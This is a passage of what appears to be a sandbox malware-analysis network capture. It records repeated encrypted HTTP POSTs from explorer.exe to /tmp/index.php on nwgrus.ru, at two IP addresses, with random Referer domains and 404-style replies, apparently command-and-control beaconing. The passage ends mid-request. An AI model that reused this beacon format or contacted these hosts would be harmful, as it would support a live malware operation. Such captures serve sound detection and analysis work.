                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          29192.168.2.661428160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:59.901226997 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://xlurbvunmfixk.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 320
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:59.901226997 CEST320OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 3e 0f a1 e5
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu>nX\eo"jyQXg(cN9d#QNV9(1A7&76f3<-D7sW)"vu0Ot=54'd
                                                                                                                          Oct 8, 2024 18:24:00.795069933 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:00 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          30192.168.2.661429160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:24:00.807672024 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://kamxftfsfgaby.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 116
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:24:00.807698011 CEST116OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 66 5b ab ba
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuf[Y]^`Zw77]}%l
                                                                                                                          Oct 8, 2024 18:24:01.753901005 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:01 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          31192.168.2.661430160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:24:01.761770964 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://oqmylvnapebvw.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 298
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:24:01.761794090 CEST298OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 65 1f d0 f7
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuei9_ON`J2zYt(b<OwPZ'dzg>Pj1fODG~^g'`f+*^=&aiMpak2\`
                                                                                                                          Oct 8, 2024 18:24:02.629125118 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:02 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          32192.168.2.661455160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:25:08.842891932 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://hyeljwvkydclsem.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 221
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:25:08.842936039 CEST221OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 72 22 ab 9f
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vur"s-fCr|D=\u$vE%k[9CzYY,%5/D#EXAU4Et.,MK
                                                                                                                          Oct 8, 2024 18:25:09.724469900 CEST151INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:25:09 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                                                          Data Ascii: r


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          33192.168.2.661456160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:25:10.395896912 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://ovnkboilnwpev.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 185
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:25:10.395910025 CEST185OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 62 49 a6 97
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vubIO~bpy9SM`!HGKG"7#%NV&6bm\\Y/\
                                                                                                                          Oct 8, 2024 18:25:11.260760069 CEST151INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:25:11 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                                                          Data Ascii: r


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          34192.168.2.661457160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:25:16.983130932 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://elavhytildeantb.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 307
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:25:16.983166933 CEST307OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7b 54 d5 be
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vu{T2E|w0 F!/_`40aX?G H7GQs"_{x]%5wN63gl$\rt=96
                                                                                                                          Oct 8, 2024 18:25:17.848952055 CEST151INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:25:17 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                                                          Data Ascii: r


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          35192.168.2.661458160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:25:24.807482958 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://qvpxnipvuyciicri.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 192
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:25:24.807482958 CEST192OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 30 a4 85
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vuU0`F`r?y2RD*F@'w!"~>R=iR'T]c@w5
                                                                                                                          Oct 8, 2024 18:25:25.693137884 CEST151INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:25:25 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                                                          Data Ascii: r


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          36192.168.2.661459160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:25:34.039405107 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://nsxfaafbvsvkfwb.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 368
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:25:34.039423943 CEST368OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 22 1c a7 fa
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vu"P4ClK[|Oz_\/y}s1G'cu(_r9#, 3@y>[?a[+R3^<rZZC=^eu`UG
                                                                                                                          Oct 8, 2024 18:25:34.892144918 CEST151INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:25:34 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                                                          Data Ascii: r


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          37192.168.2.661461160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:25:45.764981985 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://euvycibbjmraba.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 340
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:25:45.765023947 CEST340OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 70 42 d6 a1
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vupBa"cCB0$J0}jiII{G[N=EAJ5>dvG3MC.J@\{$'*Vew>@SwP-T]Q-
                                                                                                                          Oct 8, 2024 18:25:46.637793064 CEST151INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:25:46 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                                                          Data Ascii: r


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          38192.168.2.661462160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:25:59.053148985 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://istrtdmsewdifyn.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 241
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:25:59.053181887 CEST241OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5f 3e c7 fd
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vu_>[PlxMdMevC?w j-Qo3'Zi@-.a{oI\pysu;:Y`.aB/0o#I%z
                                                                                                                          Oct 8, 2024 18:25:59.918047905 CEST151INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:25:59 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                                                          Data Ascii: r


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          39192.168.2.661464190.249.249.14804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:26:16.351247072 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://chihuprqnvownoad.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 284
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:26:16.351275921 CEST284OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 21 3e e5 a3
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vu!>_cbjOn^c$N:yayKE/Xq|FB)WJc^T.JGyP^B?a<cZc1e)Mociz*[g"BJ3
                                                                                                                          Oct 8, 2024 18:26:17.379561901 CEST151INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:26:17 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                                                          Data Ascii: r


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          40192.168.2.661466190.249.249.14804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:26:35.191060066 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://muicqrvubdhbsy.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 317
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:26:35.191082001 CEST317OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 47 25 de 88
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vuG%S"b|Jcw3=]J=|SccJ^OF_[&!fDn}V9\:]V96lW` Ogg=$e
                                                                                                                          Oct 8, 2024 18:26:36.768918991 CEST151INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:26:36 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                                                          Data Ascii: r
                                                                                                                          Oct 8, 2024 18:26:36.769020081 CEST151INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:26:36 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                                                          Data Ascii: r
                                                                                                                          Oct 8, 2024 18:26:37.025470018 CEST151INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:26:36 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                                                          Data Ascii: r


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          41192.168.2.661469190.249.249.14804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:26:54.070030928 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
